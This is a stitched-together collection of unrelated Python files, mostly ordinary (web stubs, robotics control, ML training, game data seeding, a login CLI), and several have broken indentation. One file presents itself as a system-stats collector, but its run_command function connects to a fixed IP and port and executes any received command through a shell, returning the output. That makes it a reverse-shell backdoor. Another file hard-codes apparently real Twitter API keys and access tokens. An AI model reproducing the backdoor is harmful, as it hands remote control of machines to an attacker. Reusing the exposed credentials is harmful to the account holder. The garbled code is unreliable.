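    print(BaseIndexHandler.joint_sort(example_scores, example_ids))
    # -> ([0.2, 0.5, 0.8], [42, 7, 11])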
|
from flask import Flask, request, jsonify
import json
app = Flask(__name__)
@app.route("/index", methods=["POST", "GET"])
def req():
    return jsonify({"code": 0, "msg": "hello world"})
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000)
|
import tweepy
consumer_key = "P5wTozEUuNOAJCXMajGnRcDs2"
consumer_secret = "RB7p2JVEZxbodmRT3eaA32caonxpo5fS5DOKXcoTxEKJelTZys"
access_token = "997065391644917761-mSZZ6gkTdLEOdDSOAFfu7clvJO4vQPq"
access_token_secret = "MoAMNPZeAmYMwtjaopDrAs1njCwmx9pdCmC7JBP0A1uxF"
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
public_tweets = api.home_timeline()
for tweet in public_tweets:
print(tweet.text)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import PurePath
import pytest
from pants.backend.terraform.hcl2_parser import resolve_pure_path
def test_resolve_pure_path() -> None:
assert resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("../../grok")) == PurePath(
"foo/bar/grok"
)
assert resolve_pure_path(
PurePath("foo/bar/hello/world"), PurePath("../../../../grok")
) == PurePath("grok")
with pytest.raises(ValueError):
resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("../../../../../grok"))
assert resolve_pure_path(PurePath("foo/bar/hello/world"), PurePath("./grok")) == PurePath(
"foo/bar/hello/world/grok"
)
|
from django.contrib import admin
from patients.models import Patient, RegisteredPatient, NotRegisteredPatient
# Register your models here.
admin.site.register(Patient)
admin.site.register(RegisteredPatient)
admin.site.register(NotRegisteredPatient)
|
import numpy as np
import torch
def target_distribution(name):
w1 = lambda z: torch.sin(2 * np.pi * z[:, 0] / 4)
w2 = lambda z: 3 * torch.exp(-0.5 * ((z[:, 0] - 1) / 0.6) ** 2)
w3 = lambda z: 3 * torch.sigmoid((z[:, 0] - 1) / 0.3)
if name == "1":
u = lambda z: 0.5 * ((torch.norm(z, p=2, dim=1) - 2) / 0.4)**2 - \
torch.log(torch.exp(-0.5*((z[:,0] - 2) / 0.6)**2) + torch.exp(-0.5*((z[:,0] + 2) / 0.6)**2) + 1e-10)
elif name == "2":
u = lambda z: 0.5 * ((z[:,1] - w1(z)) / 0.4)**2
elif name == "3":
u = lambda z: - torch.log(torch.exp(-0.5*((z[:,1] - w1(z))/0.35)**2) + torch.exp(-0.5*((z[:,1] - w1(z) + w2(z))/0.35)**2) + 1e-10)
elif name == "4":
u = lambda z: - torch.log(torch.exp(-0.5*((z[:,1] - w1(z))/0.4)**2) + torch.exp(-0.5*((z[:,1] - w1(z) + w3(z))/0.35)**2) + 1e-10)
return u
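# Added illustration (an assumption about intended usage): the returned callable
# u(z) is an energy/potential, so exp(-u(z)) is proportional to the unnormalised
# target density; the batch below is arbitrary.
if __name__ == "__main__":
    u = target_distribution("2")
    z = torch.randn(5, 2)
    print(u(z))  # per-sample energies, shape (5,)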
|
import socket
import os
import subprocess
import psutil
import time
import threading
from queue import Queue
import wmi
from datetime import datetime, timedelta
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
system_data = {"HostName": "", "UpTime": "", "CPU": ""}
def host_name():
host_name = socket.gethostname()
system_data["HostName"] = host_name
def get_cpu():
while True:
cpu_utilization = psutil.cpu_percent(interval=1)
system_data["CPU"] = cpu_utilization
def get_uptime():
    c = wmi.WMI()
    while True:
        for os_info in c.Win32_OperatingSystem():  # avoid shadowing the os module
            boot_time_str = os_info.LastBootUpTime.split('.')[0]
            # WMI timestamps are 24-hour, so use %H rather than %I
            last_boot_time = datetime.strptime(boot_time_str, '%Y%m%d%H%M%S')
            now = datetime.now()
            uptime = now - last_boot_time
            system_data["UpTime"] = uptime
def run_command():
s = socket.socket()
host = '10.42.62.156'
port = 9999
s.connect((host, port))
while True:
data = s.recv(1028)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
output_byts = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_byts, "utf-8")
s.send(str.encode(output_str + str(os.getcwd()) + "> "))
print(output_str)
s.close()
def create_worker():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do the next Job in Queue (1 to handle connection 2 to send commands)
def work():
while True:
x = queue.get()
if x == 1:
host_name()
get_cpu()
get_uptime()
if x == 2:
run_command()
queue.task_done()
# Each list item is a new JOB
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_worker()
create_jobs()
|
#-*- coding: utf-8 -*-
print('''n = 123,
f = 456.789,
s1 = 'hello,world',
s2 = 'hello, \\\'Adam\\\'\'
s3 = r'Hello,"Bart"'
s4 = r\'\'\'Hello,
Lisa!\'\'\'
''')
s1 = 'n = 123'
s2 = 'f = 456.789'
s3 = 's2 = \'hello, \\\'Adam\\\'\''
print(s3)
print('''line1
line2
line3''')
|
import pygame
import time
pygame.init()
# initialize the joystick
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
joystick.init()
axes = joystick.get_numaxes()
while True:
    # pump the event queue so joystick axis values are refreshed
    pygame.event.pump()
    for i in range(axes):
# print out the axis values
axis = joystick.get_axis(i)
#s = 'Axis i: ' + axis
        print('Axis %d:\t%6.4f' % (i, axis))
#time.sleep(0.25)
|
#! /usr/bin/python
# coding=utf-8
import time
import select
import sys
import os
import RPi.GPIO as GPIO
import numpy as np
import picamera
import picamera.array
from picamera import PiCamera
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import time
import cv2
import math
import threading
from car import Car
from infrad import Infrad
from lane_lines import *
from detect import *
from ultrasonic import *
car = Car()
inf = Infrad()
ul = Ultrasound()
camera = PiCamera()
def find_left(car, GO):
car.set_speed(-100, 100)
time.sleep(0.15)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def find_right(car, GO):
car.set_speed(100, -100)
time.sleep(0.15)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def rush_left(car, GO):
car.set_speed(-200, 200)
time.sleep(0.1)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def rush_right(car, GO):
    # mirrored from rush_left; the original reused rush_left's speeds,
    # which looks like a copy-paste slip
    car.set_speed(200, -200)
    time.sleep(0.2)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def set_slow(car, GO):
car.set_speed(-80, -80)
time.sleep(0.25)
car.set_speed(-160, 160)
time.sleep(0.2)
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def set_forward(car, GO):
if GO:
car.set_speed(50, 50)
else:
car.set_speed(0, 0)
def stage_detect(image_in):
image = filter_colors(image_in)
gray = grayscale(image)
blur_gray = gaussian_blur(gray, kernel_size)
edges = canny(blur_gray, low_threshold, high_threshold)
imshape = image.shape
vertices = np.array([[\
((imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0]),\
((imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0])]]\
, dtype=np.int32)
masked_edges = region_of_interest(edges, vertices)
img = masked_edges
min_line_len = min_line_length
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
if lines is None:
return None
line_img = np.zeros((*img.shape, 3), dtype=np.uint8) # 3-channel RGB image
newlines = draw_lines(line_img, lines)
for line in newlines:
if line[1] < line[3]:
line[0], line[1], line[2], line[3] = line[2], line[3], line[0], line[1]
if newlines[0][0] > newlines[1][0]:
newlines[0], newlines[1] = newlines[1], newlines[0]
return(newlines)
def ros(lane, car, GO):
left, right, nl, nr = lane
left_ans = True if left else False
right_ans = True if right else False
new_left = True if nl else False
new_right = True if nr else False
# print(str(left_ans) + ", " + str(right_ans) + ", " + str(new_left) + ', ' + str(new_right))
if left_ans and right_ans and new_left and new_right:
set_forward(car, GO)
elif not left_ans and right_ans and new_left and new_right:
find_right(car, GO)
elif not right_ans and left_ans and new_left and new_right:
find_left(car, GO)
elif not new_left and new_right:
rush_left(car, GO)
elif not new_right and new_left:
rush_right(car, GO)
elif not new_left and not new_right:
set_slow(car, GO)
def LEDframe():
global STOP
rawCapture = picamera.array.PiRGBArray(camera)
for frame in camera.capture_continuous(rawCapture, format='bgr', use_video_port=True):
image = frame.array
print(image.shape)
image = image.reshape((640, 480, 3))
rawCapture.truncate(0)
light = LED_detect(image)
if light==2:
STOP = True
else:
STOP = False
print("light: ", light)
def DISframe():
global STILL
try:
while True:
dis = round(ul.get_distance(), 2)
# print("dis: ", dis)
if dis < 20:
STILL = True
else:
STILL = False
except KeyboardInterrupt:
GPIO.cleanup()
def ROSframe():
global STOP
global STILL
try:
while True:
left, right, nl, nr = inf.detect()
GO = (not STOP) and (not STILL)
ros((left, right, nl, nr), car, GO)
except KeyboardInterrupt:
GPIO.cleanup()
if __name__ == '__main__':
global STOP
global STILL
STOP = False
STILL = False
t_LED = threading.Thread(target = LEDframe, args=() )
t_DIS = threading.Thread(target = DISframe, args=() )
t_ROS = threading.Thread(target = ROSframe, args=() )
threads = [t_ROS, t_LED, t_DIS]
v1, v2 = 60, 60
car.set_speed(v1, v2)
try:
for t in threads:
t.start()
except KeyboardInterrupt:
GPIO.cleanup()
|
#! python3
import GetFromAPI
import MyYouTubeDB
import threading
import datetime
def MainRoutine():
# Run the process every N seconds
Timer = 60.0
threading.Timer(Timer, MainRoutine).start() # called every minute
Key = 'YOUTUBE-API-KEY'
SelectedMethodNumList = [1, 6]
SelectedUserNameList = ["Pewdiepie", "LifeAccordingToJimmy", "jasonjason1124"]
YouTubeData = GetFromAPI.GetYouTubeData(SelectedMethodNumList, SelectedUserNameList, Key)
if (-1 != MyYouTubeDB.StoreToDB(YouTubeData, 'StorageDB')):
print(("%s : Data collection process Successed") % datetime.datetime.now().replace(microsecond=0).isoformat(' '))
else:
print(("%s : Data collection process Failed") % datetime.datetime.now().replace(microsecond=0).isoformat(' '))
def main():
MainRoutine()
if __name__ == "__main__":
main()
|
from apps.items.models import *
from apps.inventory.models import *
def add_ship_values():
ShipValues.objects.create(
travel_time_multiplier = 5.0,
travel_cost = 20,
)
def add_rookie():
ShipTemplate.objects.create(
ship_type = ShipTemplate.ROOKIE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 600,
hitpoints_max = 600,
armor_min = 80,
armor_max = 80,
weapons_min = 2,
weapons_max = 2,
#travel stats
warp_min = 3,
warp_max = 3,
enter_warp_min = 20,
enter_warp_max = 20,
travel_modifier_min = 1.00,
travel_modifier_max = 1.00,
dock_min = 60,
dock_max = 60,
cargo_space_min = 10,
cargo_space_max = 10,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.30,
)
def add_frigate():
ShipTemplate.objects.create(
ship_type = ShipTemplate.FRIGATE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 600,
hitpoints_max = 900,
armor_min = 100,
armor_max = 220,
weapons_min = 2,
weapons_max = 3,
#travel stats
warp_min = 3.00,
warp_max = 5.00,
enter_warp_min = 13,
enter_warp_max = 18,
travel_modifier_min = 0.80,
travel_modifier_max = 1.00,
dock_min = 40,
dock_max = 60,
cargo_space_min = 10,
cargo_space_max = 20,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.50,
)
def add_frigate_t2():
ShipTemplate.objects.create(
ship_type = ShipTemplate.FRIGATE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_2,
hitpoints_min = 800,
hitpoints_max = 1100,
armor_min = 180,
armor_max = 300,
weapons_min = 2,
weapons_max = 4,
#travel stats
warp_min = 4.00,
warp_max = 6.00,
enter_warp_min = 10,
enter_warp_max = 15,
travel_modifier_min = 0.80,
travel_modifier_max = 1.10,
dock_min = 30,
dock_max = 50,
cargo_space_min = 15,
cargo_space_max = 25,
smuggle_bay_min = 0.45,
smuggle_bay_max = 0.80,
)
def add_destroyer_t1():
ShipTemplate.objects.create(
ship_type = ShipTemplate.DESTROYER,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 700,
hitpoints_max = 1000,
armor_min = 200,
armor_max = 300,
weapons_min = 3,
weapons_max = 4,
#travel stats
warp_min = 3.00,
warp_max = 5.00,
enter_warp_min = 15,
enter_warp_max = 20,
travel_modifier_min = 1.10,
travel_modifier_max = 1.40,
dock_min = 45,
dock_max = 75,
cargo_space_min = 15,
cargo_space_max = 30,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.50,
)
def add_destroyer_t2():
ShipTemplate.objects.create(
ship_type = ShipTemplate.DESTROYER,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_2,
hitpoints_min = 900,
hitpoints_max = 1200,
armor_min = 250,
armor_max = 350,
weapons_min = 3,
weapons_max = 5,
#travel stats
warp_min = 3.50,
warp_max = 5.50,
enter_warp_min = 13,
enter_warp_max = 17,
travel_modifier_min = 1.10,
travel_modifier_max = 1.40,
dock_min = 35,
dock_max = 65,
cargo_space_min = 20,
cargo_space_max = 35,
smuggle_bay_min = 0.45,
smuggle_bay_max = 0.80,
)
add_ship_values()
add_rookie()
add_frigate()
add_frigate_t2()
add_destroyer_t1()
add_destroyer_t2()
|
"""
This prototype application is available under the terms of GPLv3
Permission for other licences can and probably will be granted
if emailed at antimatter15@gmail.com.
"""
import httplib
import pickle
import urllib
import json
from optparse import OptionParser
waveid = "googlewave.com!w+Mu9eK7j2H"
parser = OptionParser(usage="usage: %prog [options] waveid")
parser.add_option("-r", "--raw",action="store_true", dest="raw",help="include raw JSON")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose",help="verbose")
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error("incorrect number of arguments")
exit()
elif args[0] == "default":
pass #yay do nothin
else:
waveid = urllib.unquote(urllib.unquote(args[0]))
if "+" not in waveid:
waveid = "w+"+waveid
if "!" not in waveid:
waveid = "googlewave.com!"+waveid
conn = httplib.HTTPSConnection("wave.google.com")
state = pickle.load(open("state.txt","r"))
session = state['session']
cookie = state['cookie']
url = "/wave/wfe/fetch/"+waveid+"/"+str(session)+"?v=3"
conn.request("GET", url, "", {"Cookie": "WAVE="+cookie})
r2 = conn.getresponse()
print r2.status, r2.reason, r2.version
wavejson = r2.read()[5:]
if options.raw:
print wavejson
exit()
wave = json.loads(wavejson)
bliplist = wave['1'][0]['1']['2']
#print bliplist
for b in bliplist:
if b['1'] == "conversation" or 'attach+' in b['1'] or 'spell+' in b['1']:
continue
print "--------------------------------------------"
print "| blip",b['1'],",".join(b['7'])
print "--------------------------------------------"
if '16' in b:
data = b['16']['2']
out = ""
for point in data: #...makes a beautiful line
if '2' in point:
out += point['2']
elif '4' in point:
out += "\n"
try:
print out.strip()
except UnicodeEncodeError:
print "Error Encoding Blip includes Non ASCII Character"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
def cloud_fraction(mask):
"""
Compute metric(s) for a single field
Parameters
----------
field : numpy array of shape (npx,npx) - npx is number of pixels
(cloud) mask field.
Returns
-------
cf : float
cloud fraction.
"""
return np.count_nonzero(mask) / mask.size
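# Illustrative usage (added, not part of the original module): a 4x4 mask with
# six cloudy pixels should give a cloud fraction of 6/16 = 0.375.
if __name__ == "__main__":
    example_mask = np.array([[1, 1, 0, 0],
                             [0, 1, 0, 0],
                             [1, 0, 1, 0],
                             [0, 0, 0, 1]])
    print(cloud_fraction(example_mask))  # 0.375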
|
# The point of writing super() is to ensure that the next method in line
# in the method resolution order (MRO) is called, which becomes important
# in multiple inheritance
# Note: super() can only be called if an ancestor inherits object eventually
class Base(object):
def __init__(self):
print("Base init'ed")
class ChildA(Base):
def __init__(self):
print("ChildA init'ed")
Base.__init__(self)
class ChildB(Base):
def __init__(self):
print("ChildB init'ed")
super(ChildB, self).__init__()
class UserDependency(Base):
def __init__(self):
print("UserDependency init'ed")
super(UserDependency, self).__init__()
class UserA(ChildA, UserDependency):
def __init__(self):
print("UserA init'ed")
super(UserA, self).__init__()
class UserB(ChildB, UserDependency):
def __init__(self):
print("UserB init'ed")
super(UserB, self).__init__()
UserA() # UserDependency never gets called because ChildA does not use super()
UserB() # UserDependency gets called before Base
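# Added illustration: printing the MRO makes the behaviour above explicit.
# UserDependency sits between ChildB and Base in UserB's MRO, so ChildB's
# cooperative super().__init__() reaches it, while ChildA's direct
# Base.__init__(self) call skips it.
print([cls.__name__ for cls in UserA.__mro__])  # UserA, ChildA, UserDependency, Base, object
print([cls.__name__ for cls in UserB.__mro__])  # UserB, ChildB, UserDependency, Base, object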
|
import torch
import torch.nn
import os
import numpy as np
import matplotlib.pyplot as plt
import glob
import math
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix
from sklearn import preprocessing
from joblib import dump, load
from torchvision.transforms import ToTensor
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import face_to_hair
# import pretrained model:
from facenet_pytorch import InceptionResnetV1
def train_model(X_train, X_test, y_train, y_test, classes, model, model_name):
X_train = np.array(X_train)
y_train = np.array(y_train)
X_test = np.array(X_test)
y_test = np.array(y_test)
model.fit(X_train, y_train)
    # evaluate the fitted model and plot its confusion matrix
plot_confusion_matrix(model, X_test, y_test)
plt.show()
# save model
if input('Save model? (y/n)') == 'y':
dump(model.best_estimator_, model_name + '.joblib')
def main():
    # classes
hair_colors = ['light', 'dark']
color_to_num = lambda c: hair_colors.index(c)
# load pretrained face recognition model
resnet = InceptionResnetV1(pretrained='vggface2').eval()
# load data
path = os.path.dirname(os.path.realpath(__file__)) + '/faces/'
face_to_emb = {}
faces = []
colors = []
for i in range(1,21):
face = 'face_' + str(i)
embeddings = []
color = face_to_hair.color[face]
faces.append(face)
colors.append(color_to_num(color))
for file in glob.glob(path + face + '/*'):
img = Image.open(file)
img = img.resize((160, 160))
img2 = img.filter(ImageFilter.GaussianBlur(radius=1))
img = ToTensor()(img)
img2 = ToTensor()(img2)
# calculate embeddings
img_embedding = resnet(img.unsqueeze(0))
embeddings.append(img_embedding.detach().numpy().ravel())
img_embedding = resnet(img2.unsqueeze(0))
embeddings.append(img_embedding.detach().numpy().ravel())
face_to_emb[face] = embeddings
print(colors)
get_num_emb = lambda f: len(face_to_emb[f])
unnest_list = lambda l: [x for sub in l for x in sub]
# train SVC on embeddings
print('training SVC')
tuned_parameters = [{'kernel': ['linear'], 'C': [1, 10, 100, 1000]}]
model_SVC = GridSearchCV(SVC(), tuned_parameters, verbose=1)
# train k-NN on embeddings
grid_params = {
'n_neighbors' : [1,3,5,11,19],
'weights' : ['distance']
}
model_kNN = GridSearchCV(
KNeighborsClassifier(),
grid_params,
verbose=1
)
faces_train, faces_test, _, _ = train_test_split(
faces, colors, stratify=colors, test_size=0.25
)
X_train = [f for f_t in faces_train for f in face_to_emb[f_t]]
X_test = [f for f_t in faces_test for f in face_to_emb[f_t]]
y_train = [[color_to_num(face_to_hair.color[f])] * get_num_emb(f) for f in faces_train]
y_train = unnest_list(y_train)
y_test = [[color_to_num(face_to_hair.color[f])] * get_num_emb(f) for f in faces_test]
y_test = unnest_list(y_test)
    # use distinct file names so the saved kNN model does not overwrite the SVC one
    train_model(X_train, X_test, y_train, y_test, hair_colors, model_SVC, 'hair_color_recog_svc')
    train_model(X_train, X_test, y_train, y_test, hair_colors, model_kNN, 'hair_color_recog_knn')
if __name__ == '__main__':
main()
|
"""Operate on pages in manual; extract data from zones and print to examination file."""
from operator import itemgetter
import xmlStaticOperators
import xmlChildSearch
import xmlTableZoneExpander
import os
class xmlTableIdentifier(object):
"""
Identify two-column pages, search them for table zones and textzones that
appear to be falsely zoned. Trigger sub-classes to extract data or operate further.
Attributes:
year: string value for manual year.
out_path: incoming out path for saved data.
zones_dictionary: incoming zone data dictionary object.
page_data: incoming page data dictionary object.
        line_data: incoming line data dictionary object.
        table_aggregate_data: counter and modified table data used by higher-level classes.
"""
def __init__(self, year, data_out_path, manual_zones_dictionary, page_data, line_data):
self.year = '19' + year
self.out_path = data_out_path
self.zones_dictionary = manual_zones_dictionary
self.page_data = page_data
self.line_data = line_data
self.create_manual_directory()
self.table_aggregate_data = self.identify_tables()
self.recursive_empty_directory_clean()
def create_manual_directory(self):
"""Create save directory for page zone data."""
xmlStaticOperators.clear_destination(self.out_path)
os.mkdir(self.out_path)
def recursive_empty_directory_clean(self):
"""Clean out empty directories to avoid saving conflicts."""
for root, dirnames, filenames in os.walk(self.out_path, topdown = False):
for dir in dirnames:
try:
os.rmdir(os.path.join(root, dir))
                except OSError:
                    # the directory is not empty; leave it in place
                    pass
@staticmethod
def manual_begin_end(year, page_index):
"""Define beginning and endpoints of manual in terms of areas to search."""
manual_begin_end_dict = {
'1920': [[-1, False], [133, True], [1513, False]],
'1921': [[-1, False], [158, True], [1751, False]],
'1922': [[-1, False], [193, True], [2077, False]],
'1923': [[-1, False], [159, True], [2414, False]],
'1924': [[-1, False], [310, True], [2878, False]],
'1925': [[-1, False], [225, True], [2405, False]],
'1926': [[-1, False], [270, True], [2665, False]],
'1927': [[-1, False], [306, True], [3057, False]],
'1928': [[-1, False], [348, True], [3425, False]],
'1929': [[-1, False], [391, True], [3485, False]]
}
# Identify nearest neighbour to page ID based on above dictionary;
# subtract bounds above from page index and find smallest non-zero value.
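        # Worked example (added for clarity): for year '1920' and page_index 500,
        # the positive differences are 501 (from [-1, False]) and 367 (from [133, True]);
        # 367 is smallest, so True is returned (the page lies inside the manual body).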
difference_list = sorted([[item, page_index - item[0]] for item in
manual_begin_end_dict[year] if page_index - item[0] > 0],
key=itemgetter(1))
begin_end_value = difference_list[0][0][1]
return begin_end_value
def create_page_directory(self, page):
"""Create save directory for page zone data."""
# slice page path string and reconstruct for output (both dir. and filename).
output_directory_fiche = page[-9:-5]
output_directory_fiche_path = os.path.join(self.out_path, output_directory_fiche)
if not os.path.exists(output_directory_fiche_path):
os.mkdir(output_directory_fiche_path)
output_directory_page = page[-4:]
return (output_directory_fiche_path, output_directory_fiche, output_directory_page)
def define_column_width(self, page):
"""Define width of columns against which to measure tables."""
page_columns = len(self.line_data[page][:-1][0].keys())
page_data = self.page_data[page]
if page_columns == 1:
column_width = page_data.page_width
elif page_columns == 2:
column_width = page_data.page_width / 2
elif page_columns == 3:
column_width = page_data.page_width / 3
return (page_columns, column_width)
def define_content_height(self, page):
"""Identify top of page content"""
# define in-function inputs.
column_top_dict = {}
column_bottom_dict = {}
line_data = self.line_data[page][0]
top_average = 0
bottom_average = 0
# loop through columns on page and define highest and lowest lines.
for index, column in line_data.items():
# define list of word objects in each line respectively.
top_row = column[max(column)]
bottom_row = column[min(column)]
# define highest high and lowest low of top and bottom rows.
column_top = max([word[1] for word in top_row])
column_bottom = min([word[1] for word in bottom_row])
# add column values to average top/bottom aggregates.
top_average += column_top
bottom_average += column_bottom
# update top/bottom dicts with top/bottom values for column.
column_top_dict.update({index: column_top})
column_bottom_dict.update({index: column_bottom})
# take averages of the column tops and bottoms to define rough page values.
top_average = top_average / len(column_top_dict) + .005
bottom_average = bottom_average / len(column_bottom_dict) - .015
return (column_top_dict, column_bottom_dict, top_average, bottom_average)
def identify_tables(self):
"""Identify tableZones from collective zone data; trigger stripping class."""
# define counters and object(s) to be returned.
manual_fullwidth_table_count = 0
manual_fullwidth_ideal_table_count = 0
table_keys_aggregate = []
modified_pages = {}
# loop through all pages in manual and trigger appropriate submodule operations.
for i, (page, data) in enumerate(self.zones_dictionary.items()):
# return T or F value for whether this page should be operated upon.
manual_operate_key = xmlTableIdentifier.manual_begin_end(self.year, i)
if manual_operate_key:
# run above-defined functions and link returned objects to new locals.
output_directory_data = self.create_page_directory(page)
page_column_data = self.define_column_width(page)
define_content_height = self.define_content_height(page)
columns = page_column_data[0]
column_width = page_column_data[1]
top_average = define_content_height[2]
bottom_average = define_content_height[3]
# determine 2-column pages; if True, trigger further conditions.
if columns > 1:
# loop through zones on page; define zone width and filter on zone type.
for zone in data:
zone_width = zone[2] - zone[4]
if zone[0] == 'tableZone':
# check if zone is column-width or a fraction thereof.
if column_width - .015 < zone_width < column_width + .03:
manual_fullwidth_table_count += 1
# define the ElementTree object from the zone object.
zone_element = zone[5]
# trigger class to ID whether the table structure is clean or not.
element_data = xmlChildSearch.xmlChildSearch(output_directory_data,
zone_element)
if element_data.clean_table:
manual_fullwidth_ideal_table_count += 1
for key in element_data.table_keys:
table_keys_aggregate.append(key)
# check if zone is partial-width and that it is within text bounds
# defined by self.define_content_height.
if (zone_width < column_width - .015 and zone[3] > bottom_average and
(zone[1] < top_average or zone[3] < top_average) and
(zone[0] == 'tableZone' or zone[0] == 'textZone')):
# check if a previous zone on this page has been modified. If yes,
# continue with the zones dictionary value from the updated dict.
# This will include the expanded zone that has been previously modified
# as well as no longer having removed zones to eliminate duplicating work.
if page in modified_pages.keys():
data = modified_pages[page][1]
# if zone has been deleted, skip loop iteration.
if zone not in data:
continue
# trigger xmlTableZoneExpander class and define output.
modified_page = xmlTableZoneExpander.xmlTableZoneExpander(page, self.page_data[page],
columns, output_directory_data,
zone, data, define_content_height)
                            # Mirror and update the modified pages dict to match the original page zone dictionary.
# (will be used to print page PDFs of only pages with modified / updated zones).
page_data = self.page_data[page]
modified_pages.update({page:[[page_data.page_dimensions[0],
page_data.page_dimensions[1]],
modified_page.page_zone_data]})
return(manual_fullwidth_table_count, manual_fullwidth_ideal_table_count, table_keys_aggregate, modified_pages)
|
import re
from getpass import getpass
from users import check_password, encrypt_password, Users, Logs
class InvalidAction(Exception):
pass
class MaxTries(Exception):
pass
class Interface:
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
NUM_TRIES = 3
def __init__(self, users: Users, logs: Logs) -> None:
# Connect to Database tables for users and logs
self.users = users
self.logs = logs
# Logged out by default
self.email = ""
self.id = None
self._set_actions()
self._set_options()
def register(self) -> None:
if self._is_loggedin():
raise InvalidAction("A logged in user can not register.")
for _ in range(self.NUM_TRIES):
try:
email = self._get_email()
# DB validation
query = self.users.read_user(email=email)
assert not query, "Email already in use.\n"
hashedPassword = self._new_password()
self.users.create_user(email=email, password=hashedPassword)
break
except AssertionError as msg:
print(msg)
else:
raise MaxTries("Max attempts exceeded, please try again later.\n")
print("\nYour account has been created.\n")
self._send_activation_email(email=email)
def login(self) -> None:
if self._is_loggedin():
raise InvalidAction("Already logged in.")
for _ in range(self.NUM_TRIES):
try:
email = self._get_email()
# DB email validation
query = self.users.read_user(email=email)
assert query, "Email address not found.\n"
# Check if account is blocked
assert not self.users.is_locked(
email
), "\nThe account is blocked for now.\n"
# Check if password matches
success = self._authenticate(query["password"])
# Register in logs database
self.logs.create_log(success, query["id"])
if success:
break
else:
print("Wrong password.\n")
                    if self.logs.failed_attempts(query["id"]) > 4:
                        print("\nThe account will be blocked for 30 minutes.\n")
                        self.users.lock_user(email=email)
except AssertionError as msg:
print(msg)
else:
raise MaxTries("Max attempts exceeded. Try again later.\n")
self._loggedin(email=email, id=query["id"])
def print_log(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to check your log.")
print("\nAccess time, Authentication success")
for log in self.logs.read_log(self.id):
print(log)
def change_email(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to change your email.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
newEmail = self._get_email()
newQuery = self.users.read_user(email=newEmail)
assert not newQuery, "Email already in use.\n"
self.users.update_email(id=self.id, email=newEmail)
self.email = newEmail
print(f"\nYour email has been changed to {newEmail}.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
def change_password(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to change your password.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
hashedPassword = self._new_password()
self.users.update_password(id=self.id, password=hashedPassword)
print("\nYour password has been changed.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
def logout(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to log out.")
self._loggedout()
def delete_account(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to delete your account.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
self.users.delete_user(id=self.id)
self.logs.delete_userlog(user_id=self.id)
print("\nYour account and related data have been deleted.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
self.logout()
def _new_password(self) -> str:
password = getpass("\nPlease enter the new password: ")
password_re = getpass("Please retype the new password: ")
self.validate_password(password, password_re)
return encrypt_password(password)
def _get_email(self) -> str:
email = input("\nPlease enter a valid email address: ")
self.validate_email(email)
return email
def _authenticate(self, password: str) -> bool:
input = getpass("Please enter your password: ")
return check_password(input, password)
def _generate_confirmation_token(self) -> None:
"""Generates confirmation token
ideally within a web framework such as Django or Flask,
or secrets.token_urlsafe() from the standard lib"""
pass
def _send_activation_email(self, email: str) -> None:
"""Sends email to specified address, with a generated confirmation token.
Possible implementation using libraries smtplib, email
"""
print("\n**Email with an activation link would have been sent now.**\n")
def _is_loggedin(self) -> bool:
return bool(self.email)
